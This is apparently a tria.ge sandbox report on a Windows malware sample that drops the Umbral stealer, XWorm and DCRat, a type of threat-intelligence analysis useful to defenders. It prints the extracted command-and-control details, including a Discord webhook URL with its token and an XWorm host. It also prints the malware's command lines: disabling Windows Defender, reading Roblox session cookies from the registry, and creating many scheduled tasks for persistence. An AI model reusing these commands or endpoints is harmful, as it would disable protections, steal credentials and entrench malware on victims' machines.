Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

3969991942...b8.exe

windows7-x64

10

3969991942...b8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    17/05/2024, 20:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3969991942bb5b6130977411ae258ab8.exe

  • Size

    19.8MB

  • MD5

    3969991942bb5b6130977411ae258ab8

  • SHA1

    c391e670488d73dc79c2acfab1e845d9c3e5227e

  • SHA256

    aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28

  • SHA512

    ce009d113cd85629cb744c0e30fecc9cb1f3bc353b546eab676604a3eec976c5f0dc60cb29b7f4841bb71bb7596128340d1b222408c9aeeb9f9671d1a1add00a

  • SSDEEP

    393216:O581WtclJGQ9GnlC58mn3yJQjNKlgtcTuOYTmWYlY5nGPEy+tj7NJX:OeWgdGnlCqm3vKCTmpY5Py+r

Score
10/10
dcratumbralxwormexecutioninfostealerratspywarestealertrojan

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Extracted

Family

xworm

C2

127.0.0.1:30683

operating-niger.gl.at.ply.gg:30683:30683
Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 42 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 42 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe
    "C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
      "C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Users\Admin\AppData\Roaming\Nursultan.exe
        "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:2764
      • C:\Users\Admin\AppData\Roaming\LoaderMas.exe
        "C:\Users\Admin\AppData\Roaming\LoaderMas.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2672
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:756
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1216
    • C:\Users\Admin\AppData\Roaming\t.bat
      "C:\Users\Admin\AppData\Roaming\t.bat"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2436
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\perfdhcpSvc\mStUjP0ksX5N.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:584
          • C:\perfdhcpSvc\Chainprovider.exe
            "C:\perfdhcpSvc\Chainprovider.exe"
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3020
            • C:\perfdhcpSvc\Chainprovider.exe
              "C:\perfdhcpSvc\Chainprovider.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              PID:2436
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FHohgUYXub.bat"
                7⤵
                  PID:2520
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:1852
                    • C:\Program Files\7-Zip\Lang\conhost.exe
                      "C:\Program Files\7-Zip\Lang\conhost.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2568
        • C:\Users\Admin\AppData\Roaming\Umbral.exe
          "C:\Users\Admin\AppData\Roaming\Umbral.exe"
          2⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2572
          • C:\Windows\system32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
            3⤵
            • Views/modifies file attributes
            PID:2852
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1068
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2484
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2804
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            3⤵
              PID:2044
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              3⤵
                PID:1068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2872
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                3⤵
                • Detects videocard installed
                PID:1468
              • C:\Windows\system32\cmd.exe
                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
                3⤵
                  PID:2368
                  • C:\Windows\system32\PING.EXE
                    ping localhost
                    4⤵
                    • Runs ping.exe
                    PID:2164
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:944
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2344
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1552
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\perfdhcpSvc\services.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2596
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\perfdhcpSvc\services.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1556
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\perfdhcpSvc\services.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2644
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\services.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2628
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\services.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2788
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\services.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2772
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Nurik\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2516
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Nurik\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2116
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Nurik\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2864
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Nurik\cmd.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2740
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Nurik\cmd.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2688
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Nurik\cmd.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1636
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "ChainproviderC" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Chainprovider.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1808
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "Chainprovider" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Chainprovider.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1052
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "ChainproviderC" /sc MINUTE /mo 8 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\Chainprovider.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2980
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Sidebar\Idle.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2488
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Idle.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1840
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\Idle.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1676
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2252
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2856
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:324
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WMICW" /sc MINUTE /mo 7 /tr "'C:\Nurik\WMIC.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2692
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WMIC" /sc ONLOGON /tr "'C:\Nurik\WMIC.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1796
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WMICW" /sc MINUTE /mo 13 /tr "'C:\Nurik\WMIC.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1592
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\lsm.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1612
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\lsm.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1388
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\lsm.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:600
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3048
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2264
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\Lang\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:900
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\conhost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1508
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1672
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\50341a82-0d88-11ef-8a7e-5aba25856535\conhost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1892
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WMICW" /sc MINUTE /mo 12 /tr "'C:\Nurik\WMIC.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2236
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WMIC" /sc ONLOGON /tr "'C:\Nurik\WMIC.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:984
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WMICW" /sc MINUTE /mo 7 /tr "'C:\Nurik\WMIC.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1732
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\Idle.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2180
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\Idle.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3060
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\Idle.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1728

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\FHohgUYXub.bat
              Filesize

              204B

              MD5

              9a464aef60cc0f26023f2b631b46f218

              SHA1

              7b9664462e50e8e6ebb11c3ce3404ffb6074f7e2

              SHA256

              12f0fa31baeb6c483cfb0973403cc7ee14e223db3580dc528db77e209332c8a8

              SHA512

              54b95270074e78b95e50a2206f92870e6a163bc864d6b3d34fd483c7194857f75b9365a4997c8aa07bb64ab960e645204c0d27c8fad1f13d7c1b1cd2b5f3d243

              Download Submit

            • C:\Users\Admin\AppData\Roaming\LoaderMas.exe
              Filesize

              63KB

              MD5

              a0dbdf3af38ead2237ccb781a098a431

              SHA1

              1434296af6c5530eb036718e860490e0adc3321a

              SHA256

              6f483da6b36646bf6f33db0c210bd3683ff29428a44d916a2f26a4240c1a9901

              SHA512

              dd7dc91a2e09b0c3906efbb486fb84d0289dc61338afd75d203f1ab2f49556c9523a8a9abc913363a45dde8194f5b2ee9d3d659807250047331944c39006edc3

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
              Filesize

              7KB

              MD5

              7219d4d13093e048d0d942521dcff4a6

              SHA1

              c47e08076dc39e04b9a7940a75c2a4d1e4eae2bb

              SHA256

              e9ba3ee64d0c0e1974b1ee361efd318a48a01372e45a30c6b813f95fe44064fb

              SHA512

              8691b30e5af83d4dbd49b690485822f0bdcbc85b5a58fc6be1e2644f5abd9d5eef9148d4606461f30c1e504d725b5e2e415e5de49f55c2ad5cf93286be359889

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
              Filesize

              18.2MB

              MD5

              ed965403e795c3b563d67c734472ad93

              SHA1

              6b8b929239d5ef8f1f546c591c67acaf560de4dc

              SHA256

              6b7473e7177ef0666f6afe36b257d0730dababefc209ee1c5f2da319dbe1633d

              SHA512

              bd860103c5ac1bcc02bfefc669616a1b0103dfb3c611b0e4499cf4b1fc67d49c9cd57c1839936b75e0f0008aec0f84cb0af712feb334957972661405a137f649

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Nursultan.exe
              Filesize

              17.9MB

              MD5

              e504e3fc36fe4d6f182c98923979a779

              SHA1

              3ba9f1a9a15b79639a20cfcf79c9de31d15a17a6

              SHA256

              70b7b95bb952b3325476867307fc5bd4df5769b97bbcdd8b60e7b46e1b38e4a0

              SHA512

              63bbbc3ccf14b2846df64b8edae52b6431df52aa9e03569a28ca239ab02db94bf79ca8a0a30529e35a04ee5845768d752b99e6ce3830ab440c57850180ad1647

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Umbral.exe
              Filesize

              229KB

              MD5

              f48ef033300ec9fd3c77afff5c20e95f

              SHA1

              22d6125b980474b3f54937003a765cdd5352f9a8

              SHA256

              72ee11a905ca278130f02397422b4cc4944851065ce0072f9888b70c5ad40f1e

              SHA512

              847ee8cdb14879089c861168d6be90325304df490668a38447b37772423e6dab5e32a5df344ceb58410d3b24cf25cd7221e8768951e5aca14820996a1e8304bc

              Download Submit

            • C:\Users\Admin\AppData\Roaming\t.bat
              Filesize

              1.1MB

              MD5

              d85bd59cf0808fb894f60773e1594a0a

              SHA1

              84b9d205f3ae6ca4f8f1bb938ee8b4d452444cde

              SHA256

              f3ef597673421e514d7fed82b40d65386c3811c4a8f5553afd59fc632bca8746

              SHA512

              225788e3e98449f53e6206c585315a37c9ff6ed0b5425b2a98e50c7ac45ab3c187ccf7626f126ba300bd8dbdf89c864e89f85d6264edc89281745b081ec58f97

              Download Submit

            • C:\perfdhcpSvc\Chainprovider.exe
              Filesize

              827KB

              MD5

              d2ec227ddac047e735393e58e742fd44

              SHA1

              7aae5c76378f7cfcff8bb983695fa4c2577a20e2

              SHA256

              0e679527f2df9f87d33c82023256fac276c36006579d2d71877ccab4be847cce

              SHA512

              5a11b292a574bd2ca6c225af1e4c9f95004a49ce816cc59a73d4ab6e2a0b007a58ab56e5e0c004901c3ebe4ec06054e6e801f8e659711856857add6d43f38979

              Download Submit

            • C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe
              Filesize

              200B

              MD5

              00b53f3e200522631227cac1a07e0646

              SHA1

              a0c69d58c7ca10f5fd5e1320b1b2f92081d7fcfe

              SHA256

              486c050aadc42906113b0c5c8485dff36b0187f343a732542608a91b0565146c

              SHA512

              22241ae8a31c7e564c9fb652947e4fe17f80c6e94dfe1a3bb5890f6eb97797ee32ccfff5d647eef02bda31bd47c5d95521cd0c6349a01e501e6e064ea6306243

              Download Submit

            • C:\perfdhcpSvc\mStUjP0ksX5N.bat
              Filesize

              34B

              MD5

              a9330c6da12d90d5d956ae2bbcf017d7

              SHA1

              7ebaa14eed80db6d9f0c0c0f1ecab1a9c3f61410

              SHA256

              b49853470383dce14680f656aca7ea449b1d6aabb3f18d4165ebd7e3e7545393

              SHA512

              557c91cc1cc0d7309f50e286644a2da543c0283d4a1659f7d31554282ddc48b5f972d98d5a01433078fdbe6cc813bb6f7c120e2307fae48c5d81be44ae823228

              Download Submit

            • memory/1068-52-0x00000000027E0000-0x00000000027E8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1068-46-0x000000001B7B0000-0x000000001BA92000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/1372-30-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

              Filesize

              9.9MB

              Download

            • memory/1372-9-0x0000000000F50000-0x000000000218A000-memory.dmp

              Filesize

              18.2MB

              Download

            • memory/1372-14-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

              Filesize

              9.9MB

              Download

            • memory/1428-58-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/1428-64-0x0000000001FE0000-0x0000000001FE8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1600-21-0x0000000000D90000-0x0000000000DD0000-memory.dmp

              Filesize

              256KB

              Download

            • memory/1852-0-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1852-1-0x0000000000B80000-0x0000000001F50000-memory.dmp

              Filesize

              19.8MB

              Download

            • memory/1920-76-0x0000000002990000-0x0000000002998000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1920-75-0x000000001B670000-0x000000001B952000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2484-97-0x000000001B5B0000-0x000000001B892000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2484-98-0x0000000001E50000-0x0000000001E58000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2568-166-0x0000000000F60000-0x0000000001036000-memory.dmp

              Filesize

              856KB

              Download

            • memory/2672-31-0x0000000000080000-0x0000000000096000-memory.dmp

              Filesize

              88KB

              Download

            • memory/2764-65-0x0000000140000000-0x0000000142153000-memory.dmp

              Filesize

              33.3MB

              Download

            • memory/2764-47-0x0000000077A60000-0x0000000077A62000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2764-49-0x0000000077A60000-0x0000000077A62000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2764-51-0x0000000077A60000-0x0000000077A62000-memory.dmp

              Filesize

              8KB

              Download

